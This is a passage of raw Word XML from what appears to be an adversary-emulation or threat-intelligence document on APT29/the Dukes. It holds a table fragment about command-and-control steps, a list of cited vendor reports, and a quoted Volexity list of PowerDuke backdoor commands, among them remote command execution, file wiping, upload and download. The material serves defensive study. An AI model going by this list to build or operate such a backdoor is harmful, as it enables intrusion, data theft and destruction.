              <w:t>Protocol :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005B3D45">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="046CA3FE" w14:textId="465E6118" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56DC034A" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51771AAE" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61475528" w14:textId="403749BA" w:rsidR="00683513" w:rsidRPr="005B3D45" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="089AD878" w14:textId="6ED5EDF6" w:rsidR="00683513" w:rsidRPr="00D400A7" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Then next command</w:t>
            </w:r>
            <w:r w:rsidR="006A0E83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (and return the screen capture)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00683513" w:rsidRPr="00B857D7" w14:paraId="49887487" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74212C40" w14:textId="77777777" w:rsidR="00683513" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37AB79AE" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="00B857D7" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4867C760" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="00B857D7" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50588C6F" w14:textId="77777777" w:rsidR="00683513" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70106101" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="00B857D7" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6645AB" w14:textId="77777777" w:rsidR="00683513" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="518B96F3" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="00B857D7" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="732ABC58" w14:textId="77777777" w:rsidR="00683513" w:rsidRPr="00B857D7" w:rsidRDefault="00683513" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EF34E8E" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="0077286F" w:rsidRDefault="0022561D" w:rsidP="0022561D"/>
    <w:p w14:paraId="5719AB6D" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00C94979" w:rsidRDefault="0022561D" w:rsidP="0022561D"/>
    <w:p w14:paraId="0ED24898" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">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3437BA73" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ESET_Operation_Ghost_Dukes.pdf (welivesecurity.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F88F57" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">
      <w:r w:rsidRPr="00B23FA5">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>New sophisticated email-based attack from NOBELIUM - Microsoft Security Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2021]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529FD3F9" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>eset_threat_report_t32021.pdf (welivesecurity.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5893C95A" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CERTFR-2021-CTI-011.pdf (ssi.gouv.fr)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (not directly ATT&amp;CK but linked from [3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>] )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38A06FFE" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Assembling the Russian Nesting Doll: UNC2452 Merged into APT29 | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (additional to ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF52522" w14:textId="28051DEC" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>PowerDuke</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Volexity</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (this is referenced on p7 of [1] in description of attack) [2016]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6759C179" w14:textId="0C97E058" w:rsidR="00D400A7" w:rsidRPr="00B23FA5" w:rsidRDefault="00D400A7" w:rsidP="0022561D">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>The Dukes of Moscow - VMware Security Blog - VMware</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3CB39" w14:textId="77777777" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00B86816"/>
    <w:p w14:paraId="6536C484" w14:textId="77777777" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00B86816">
      <w:r>
        <w:t>[6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A7D8A7" w14:textId="77777777" w:rsidR="00D54779" w:rsidRPr="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D54779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D54779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F4075" w14:textId="77777777" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> backdoor boasts a pretty extensive list of features that allow the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Dukes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to examine and control a system. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Volexity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> suspects the feature set that has been built into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is an extension of their anti-VM capabilities in the initial dropper files. Several commands supported by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> facilitate getting information about the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C88E6A" w14:textId="77777777" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779"/>
    <w:p w14:paraId="07B4F50E" w14:textId="724A012E" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:r>
        <w:t xml:space="preserve">A previous analysis of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> showed it supported the following commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4429D163" w14:textId="1C1C42AA" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>comp</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">get the NetBIOS name via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetComputerNameEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13528F63" w14:textId="03363E77" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">get the computer's domain via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetWkstaGetInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="615377A5" w14:textId="53071260" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>drives</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>get logical drives, drive type, free space, serial number, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D482A9" w14:textId="77777777" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fsize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">get the size of a file via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetFileAttributesExW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or failing that, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A21D500" w14:textId="491C9BF3" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>by mapping the file and getting the size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF53598" w14:textId="59C015A2" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">stop a process via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TerminateProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0015E4D6" w14:textId="77777777" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>memstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">get memory usage status via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GlobalMemoryStatusEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, total RAM, percent used, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F88656" w14:textId="74C01485" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">get the time the machine was built (via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>InstallDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> registry key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DD0F9F" w14:textId="77777777" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">get OS info via registry, such as ProductName, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73466B9B" w14:textId="6997852D" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CurrentBuild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, CurrentVersion, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CSDBuildNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B0308" w14:textId="3B2AB63D" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pslist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>list processes via CreateToolhelp32Snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D02F23" w14:textId="709E1B52" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">get current directory via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetCurrentDirectoryW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55AD147A" w14:textId="7C8B1ED5" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">start a process via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CreateProcessW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BF76016" w14:textId="77777777" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>runs cmd.exe /c and gets the output via Named Pipe and sends the data back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E2F0C" w14:textId="002ACFF0" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>siduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">gets the current user's SID via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetTokenInformation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LookupAccountSidW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62CF86FF" w14:textId="0577D5BA" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">the time + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>timezone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetLocalTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetTimeZoneInformation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7AC1D9" w14:textId="614EE223" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>uptime</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>number of seconds since the last boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B7A2C" w14:textId="2A464F50" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">the user's name via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetUserNameExW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="743AC9BD" w14:textId="665D87A7" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>wipe</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>writes random data across a file, then deletes the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A5D1C" w14:textId="2D29F879" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wnd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>gets the text of the current foreground window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2C1FB" w14:textId="3E2DF587" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fgetp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>download file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C8869C" w14:textId="0430FF08" w:rsidR="00D54779" w:rsidRDefault="00D54779" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fputp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>upload file</w:t>
      </w:r>
    </w:p>
